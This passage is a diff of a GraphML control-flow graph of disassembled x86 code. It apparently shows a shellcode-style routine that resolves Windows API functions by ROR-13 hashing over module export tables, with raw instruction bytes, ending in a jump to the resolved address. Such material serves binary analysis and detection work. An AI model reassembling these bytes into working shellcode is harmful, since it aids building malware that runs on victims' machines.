+          <data key="address">0x1024</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1cf0d</data>
           <data key="instruction.source">ror edi, 0xd</data>
         </node>
-        <node id="block.0x1021:instruction.0x1024">
-          <data key="address">0x1024</data>
+        <node id="block.0x1024:instruction.0x1027">
+          <data key="address">0x1027</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01c7</data>
           <data key="instruction.source">add edi, eax</data>
         </node>
-        <node id="block.0x1021:instruction.0x1026">
-          <data key="address">0x1026</data>
+        <node id="block.0x1024:instruction.0x1029">
+          <data key="address">0x1029</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">49</data>
           <data key="instruction.source">dec ecx</data>
         </node>
-        <node id="block.0x1021:instruction.0x1027">
-          <data key="address">0x1027</data>
+        <node id="block.0x1024:instruction.0x102a">
+          <data key="address">0x102a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">75ef</data>
-          <data key="instruction.source">jne 0x1018</data>
+          <data key="instruction.source">jne 0x101b</data>
         </node>
-        <edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
-        <edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
-        <edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
+        <edge source="block.0x1024:instruction.0x1024" target="block.0x1024:instruction.0x1027"/>
+        <edge source="block.0x1024:instruction.0x1027" target="block.0x1024:instruction.0x1029"/>
+        <edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
       </graph>
     </node>
-    <node id="block.0x1029">
-      <data key="address">0x1029</data>
+    <node id="block.0x102c">
+      <data key="address">0x102c</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1029</data>
+        <data key="address">0x102c</data>
         <data key="type">block</data>
-        <node id="block.0x1029:instruction.0x1029">
-          <data key="address">0x1029</data>
+        <node id="block.0x102c:instruction.0x102c">
+          <data key="address">0x102c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">52</data>
           <data key="instruction.source">push edx</data>
         </node>
-        <node id="block.0x1029:instruction.0x102a">
-          <data key="address">0x102a</data>
+        <node id="block.0x102c:instruction.0x102d">
+          <data key="address">0x102d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">57</data>
           <data key="instruction.source">push edi</data>
         </node>
-        <node id="block.0x1029:instruction.0x102b">
-          <data key="address">0x102b</data>
+        <node id="block.0x102c:instruction.0x102e">
+          <data key="address">0x102e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b5210</data>
           <data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
         </node>
-        <node id="block.0x1029:instruction.0x102e">
-          <data key="address">0x102e</data>
+        <node id="block.0x102c:instruction.0x1031">
+          <data key="address">0x1031</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b423c</data>
           <data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
         </node>
-        <node id="block.0x1029:instruction.0x1031">
-          <data key="address">0x1031</data>
+        <node id="block.0x102c:instruction.0x1034">
+          <data key="address">0x1034</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
         </node>
-        <node id="block.0x1029:instruction.0x1033">
-          <data key="address">0x1033</data>
+        <node id="block.0x102c:instruction.0x1036">
+          <data key="address">0x1036</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4078</data>
           <data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
         </node>
-        <node id="block.0x1029:instruction.0x1036">
-          <data key="address">0x1036</data>
+        <node id="block.0x102c:instruction.0x1039">
+          <data key="address">0x1039</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x1029:instruction.0x1038">
-          <data key="address">0x1038</data>
+        <node id="block.0x102c:instruction.0x103b">
+          <data key="address">0x103b</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">744c</data>
-          <data key="instruction.source">je 0x1086</data>
+          <data key="instruction.hex">744a</data>
+          <data key="instruction.source">je 0x1087</data>
         </node>
-        <edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
-        <edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
-        <edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
-        <edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
-        <edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
-        <edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
-        <edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
-        <edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
-        <edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
+        <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
+        <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
+        <edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
+        <edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
+        <edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
+        <edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
+        <edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
+        <edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
+        <edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
       </graph>
     </node>
-    <node id="block.0x103a">
-      <data key="address">0x103a</data>
+    <node id="block.0x103d">
+      <data key="address">0x103d</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x103a</data>
+        <data key="address">0x103d</data>
         <data key="type">block</data>
-        <node id="block.0x103a:instruction.0x103a">
-          <data key="address">0x103a</data>
+        <node id="block.0x103d:instruction.0x103d">
+          <data key="address">0x103d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
         </node>
-        <node id="block.0x103a:instruction.0x103c">
-          <data key="address">0x103c</data>
+        <node id="block.0x103d:instruction.0x103f">
+          <data key="address">0x103f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">50</data>
           <data key="instruction.source">push eax</data>
         </node>
-        <node id="block.0x103a:instruction.0x103d">
-          <data key="address">0x103d</data>
+        <node id="block.0x103d:instruction.0x1040">
+          <data key="address">0x1040</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4818</data>
           <data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
         </node>
-        <node id="block.0x103a:instruction.0x1040">
-          <data key="address">0x1040</data>
+        <node id="block.0x103d:instruction.0x1043">
+          <data key="address">0x1043</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b5820</data>
           <data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
         </node>
-        <node id="block.0x103a:instruction.0x1043">
-          <data key="address">0x1043</data>
+        <node id="block.0x103d:instruction.0x1046">
+          <data key="address">0x1046</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d3</data>
           <data key="instruction.source">add ebx, edx</data>
         </node>
-        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
-        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
-        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
-        <edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
+        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
+        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
+        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
+        <edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
       </graph>
     </node>
-    <node id="block.0x1045">
-      <data key="address">0x1045</data>
+    <node id="block.0x1048">
+      <data key="address">0x1048</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1045</data>
+        <data key="address">0x1048</data>
         <data key="type">block</data>
-        <node id="block.0x1045:instruction.0x1045">
-          <data key="address">0x1045</data>
+        <node id="block.0x1048:instruction.0x1048">
+          <data key="address">0x1048</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c9</data>
           <data key="instruction.source">test ecx, ecx</data>
         </node>
-        <node id="block.0x1045:instruction.0x1047">
-          <data key="address">0x1047</data>
+        <node id="block.0x1048:instruction.0x104a">
+          <data key="address">0x104a</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">743c</data>
-          <data key="instruction.source">je 0x1085</data>
+          <data key="instruction.hex">743a</data>
+          <data key="instruction.source">je 0x1086</data>
         </node>
-        <edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
+        <edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
       </graph>
     </node>
-    <node id="block.0x1049">
-      <data key="address">0x1049</data>
+    <node id="block.0x104c">
+      <data key="address">0x104c</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1049</data>
+        <data key="address">0x104c</data>
         <data key="type">block</data>
-        <node id="block.0x1049:instruction.0x1049">
-          <data key="address">0x1049</data>
+        <node id="block.0x104c:instruction.0x104c">
+          <data key="address">0x104c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">49</data>
           <data key="instruction.source">dec ecx</data>
         </node>
-        <node id="block.0x1049:instruction.0x104a">
-          <data key="address">0x104a</data>
+        <node id="block.0x104c:instruction.0x104d">
+          <data key="address">0x104d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b348b</data>
           <data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
         </node>
-        <node id="block.0x1049:instruction.0x104d">
-          <data key="address">0x104d</data>
+        <node id="block.0x104c:instruction.0x1050">
+          <data key="address">0x1050</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d6</data>
           <data key="instruction.source">add esi, edx</data>
         </node>
-        <node id="block.0x1049:instruction.0x104f">
-          <data key="address">0x104f</data>
+        <node id="block.0x104c:instruction.0x1052">
+          <data key="address">0x1052</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">31ff</data>
-          <data key="instruction.source">xor edi, edi</data>
+          <data key="instruction.hex">8b7df8</data>
+          <data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
         </node>
-        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
-        <edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
-        <edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
+        <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
+        <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
+        <edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
       </graph>
     </node>
-    <node id="block.0x1051">
-      <data key="address">0x1051</data>
+    <node id="block.0x1055">
+      <data key="address">0x1055</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1051</data>
+        <data key="address">0x1055</data>
         <data key="type">block</data>
-        <node id="block.0x1051:instruction.0x1051">
-          <data key="address">0x1051</data>
+        <node id="block.0x1055:instruction.0x1055">
+          <data key="address">0x1055</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
         </node>
-        <node id="block.0x1051:instruction.0x1053">
-          <data key="address">0x1053</data>
+        <node id="block.0x1055:instruction.0x1057">
+          <data key="address">0x1057</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ac</data>
           <data key="instruction.source">lodsb al, byte ptr [esi]</data>
         </node>
-        <node id="block.0x1051:instruction.0x1054">
-          <data key="address">0x1054</data>
+        <node id="block.0x1055:instruction.0x1058">
+          <data key="address">0x1058</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1cf0d</data>
           <data key="instruction.source">ror edi, 0xd</data>
         </node>
-        <node id="block.0x1051:instruction.0x1057">
-          <data key="address">0x1057</data>
+        <node id="block.0x1055:instruction.0x105b">
+          <data key="address">0x105b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01c7</data>
           <data key="instruction.source">add edi, eax</data>
         </node>
-        <node id="block.0x1051:instruction.0x1059">
-          <data key="address">0x1059</data>
+        <node id="block.0x1055:instruction.0x105d">
+          <data key="address">0x105d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">38e0</data>
           <data key="instruction.source">cmp al, ah</data>
         </node>
-        <node id="block.0x1051:instruction.0x105b">
-          <data key="address">0x105b</data>
+        <node id="block.0x1055:instruction.0x105f">
+          <data key="address">0x105f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">75f4</data>
-          <data key="instruction.source">jne 0x1051</data>
+          <data key="instruction.source">jne 0x1055</data>
         </node>
-        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
-        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
-        <edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
-        <edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
-        <edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
-        <edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
-        <edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
-        <edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
+        <edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1057"/>
+        <edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1058"/>
+        <edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x105d"/>
+        <edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105b"/>
+        <edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105d"/>
+        <edge source="block.0x1055:instruction.0x1058" target="block.0x1055:instruction.0x105b"/>
+        <edge source="block.0x1055:instruction.0x105b" target="block.0x1055:instruction.0x105d"/>
+        <edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
       </graph>
     </node>
-    <node id="block.0x105d">
-      <data key="address">0x105d</data>
+    <node id="block.0x1061">
+      <data key="address">0x1061</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x105d</data>
+        <data key="address">0x1061</data>
         <data key="type">block</data>
-        <node id="block.0x105d:instruction.0x105d">
-          <data key="address">0x105d</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">037df8</data>
-          <data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
-        </node>
-        <node id="block.0x105d:instruction.0x1060">
-          <data key="address">0x1060</data>
+        <node id="block.0x1061:instruction.0x1061">
+          <data key="address">0x1061</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3b7d24</data>
           <data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
         </node>
-        <node id="block.0x105d:instruction.0x1063">
-          <data key="address">0x1063</data>
+        <node id="block.0x1061:instruction.0x1064">
+          <data key="address">0x1064</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">75e0</data>
-          <data key="instruction.source">jne 0x1045</data>
+          <data key="instruction.hex">75e2</data>
+          <data key="instruction.source">jne 0x1048</data>
         </node>
-        <edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
-        <edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
+        <edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
       </graph>
     </node>
-    <node id="block.0x1065">
-      <data key="address">0x1065</data>
+    <node id="block.0x1066">
+      <data key="address">0x1066</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1065</data>
+        <data key="address">0x1066</data>
         <data key="type">block</data>
-        <node id="block.0x1065:instruction.0x1065">
-          <data key="address">0x1065</data>
+        <node id="block.0x1066:instruction.0x1066">
+          <data key="address">0x1066</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">58</data>
           <data key="instruction.source">pop eax</data>
         </node>
-        <node id="block.0x1065:instruction.0x1066">
-          <data key="address">0x1066</data>
+        <node id="block.0x1066:instruction.0x1067">
+          <data key="address">0x1067</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b5824</data>
           <data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
         </node>
-        <node id="block.0x1065:instruction.0x1069">
-          <data key="address">0x1069</data>
+        <node id="block.0x1066:instruction.0x106a">
+          <data key="address">0x106a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d3</data>
           <data key="instruction.source">add ebx, edx</data>
         </node>
-        <node id="block.0x1065:instruction.0x106b">
-          <data key="address">0x106b</data>
+        <node id="block.0x1066:instruction.0x106c">
+          <data key="address">0x106c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">668b0c4b</data>
           <data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
         </node>
-        <node id="block.0x1065:instruction.0x106f">
-          <data key="address">0x106f</data>
+        <node id="block.0x1066:instruction.0x1070">
+          <data key="address">0x1070</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b581c</data>
           <data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
         </node>
-        <node id="block.0x1065:instruction.0x1072">
-          <data key="address">0x1072</data>
+        <node id="block.0x1066:instruction.0x1073">
+          <data key="address">0x1073</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d3</data>
           <data key="instruction.source">add ebx, edx</data>
         </node>
-        <node id="block.0x1065:instruction.0x1074">
-          <data key="address">0x1074</data>
+        <node id="block.0x1066:instruction.0x1075">
+          <data key="address">0x1075</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b048b</data>
           <data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
         </node>
-        <node id="block.0x1065:instruction.0x1077">
-          <data key="address">0x1077</data>
+        <node id="block.0x1066:instruction.0x1078">
+          <data key="address">0x1078</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
         </node>
-        <node id="block.0x1065:instruction.0x1079">
-          <data key="address">0x1079</data>
+        <node id="block.0x1066:instruction.0x107a">
+          <data key="address">0x107a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">89442424</data>
           <data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
         </node>
-        <node id="block.0x1065:instruction.0x107d">
-          <data key="address">0x107d</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">5b</data>
-          <data key="instruction.source">pop ebx</data>
-        </node>
-        <node id="block.0x1065:instruction.0x107e">
+        <node id="block.0x1066:instruction.0x107e">
           <data key="address">0x107e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5b</data>
           <data key="instruction.source">pop ebx</data>
         </node>
-        <node id="block.0x1065:instruction.0x107f">
+        <node id="block.0x1066:instruction.0x107f">
           <data key="address">0x107f</data>
           <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop ebx</data>
+        </node>
+        <node id="block.0x1066:instruction.0x1080">
+          <data key="address">0x1080</data>
+          <data key="type">instruction</data>
           <data key="instruction.hex">61</data>
           <data key="instruction.source">popal</data>
         </node>
-        <node id="block.0x1065:instruction.0x1080">
-          <data key="address">0x1080</data>
+        <node id="block.0x1066:instruction.0x1081">
+          <data key="address">0x1081</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">59</data>
           <data key="instruction.source">pop ecx</data>
         </node>
-        <node id="block.0x1065:instruction.0x1081">
-          <data key="address">0x1081</data>
+        <node id="block.0x1066:instruction.0x1082">
+          <data key="address">0x1082</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5a</data>
           <data key="instruction.source">pop edx</data>
         </node>
-        <node id="block.0x1065:instruction.0x1082">
-          <data key="address">0x1082</data>
+        <node id="block.0x1066:instruction.0x1083">
+          <data key="address">0x1083</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">51</data>
           <data key="instruction.source">push ecx</data>
         </node>
-        <node id="block.0x1065:instruction.0x1083">
-          <data key="address">0x1083</data>
+        <node id="block.0x1066:instruction.0x1084">
+          <data key="address">0x1084</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ffe0</data>
           <data key="instruction.source">jmp eax</data>
         </node>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
-        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
-        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
-        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
-        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
-        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
-        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
-        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
-        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
-        <edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
-        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
-        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
-        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
-        <edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
-        <edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
-      </graph>
-    </node>
-    <node id="block.0x1085">
-      <data key="address">0x1085</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">0x1085</data>
-        <data key="type">block</data>
-        <node id="block.0x1085:instruction.0x1085">
-          <data key="address">0x1085</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">58</data>
-          <data key="instruction.source">pop eax</data>
-        </node>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
+        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
+        <edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
+        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
+        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
+        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
+        <edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
+        <edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
       </graph>
     </node>
     <node id="block.0x1086">
@@ -566,44 +545,58 @@
         <node id="block.0x1086:instruction.0x1086">
           <data key="address">0x1086</data>
           <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop eax</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1087">
+      <data key="address">0x1087</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1087</data>
+        <data key="type">block</data>
+        <node id="block.0x1087:instruction.0x1087">
+          <data key="address">0x1087</data>
+          <data key="type">instruction</data>
           <data key="instruction.hex">5f</data>
           <data key="instruction.source">pop edi</data>
         </node>
-        <node id="block.0x1086:instruction.0x1087">
-          <data key="address">0x1087</data>
+        <node id="block.0x1087:instruction.0x1088">
+          <data key="address">0x1088</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5a</data>
           <data key="instruction.source">pop edx</data>
         </node>
-        <node id="block.0x1086:instruction.0x1088">
-          <data key="address">0x1088</data>
+        <node id="block.0x1087:instruction.0x1089">
+          <data key="address">0x1089</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b12</data>
           <data key="instruction.source">mov edx, dword ptr [edx]</data>
         </node>
-        <node id="block.0x1086:instruction.0x108a">
-          <data key="address">0x108a</data>
+        <node id="block.0x1087:instruction.0x108b">
+          <data key="address">0x108b</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">eb83</data>
+          <data key="instruction.hex">eb82</data>
           <data key="instruction.source">jmp 0x100f</data>
         </node>
-        <edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
-        <edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
-        <edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
+        <edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x1088"/>
+        <edge source="block.0x1087:instruction.0x1088" target="block.0x1087:instruction.0x1089"/>
+        <edge source="block.0x1087:instruction.0x1089" target="block.0x1087:instruction.0x108b"/>
       </graph>
     </node>
     <edge source="block.0x1000" target="block.0x100f"/>
-    <edge source="block.0x100f" target="block.0x1018"/>
-    <edge source="block.0x1018" target="block.0x101f"/>
-    <edge source="block.0x101f" target="block.0x1021"/>
-    <edge source="block.0x1021" target="block.0x1029"/>
-    <edge source="block.0x1029" target="block.0x103a"/>
-    <edge source="block.0x103a" target="block.0x1045"/>
-    <edge source="block.0x1045" target="block.0x1049"/>
-    <edge source="block.0x1049" target="block.0x1051"/>
-    <edge source="block.0x1051" target="block.0x105d"/>
-    <edge source="block.0x105d" target="block.0x1065"/>
-    <edge source="block.0x1065" target="block.0x1085"/>
-    <edge source="block.0x1085" target="block.0x1086"/>
+    <edge source="block.0x100f" target="block.0x101b"/>
+    <edge source="block.0x101b" target="block.0x1022"/>
+    <edge source="block.0x1022" target="block.0x1024"/>
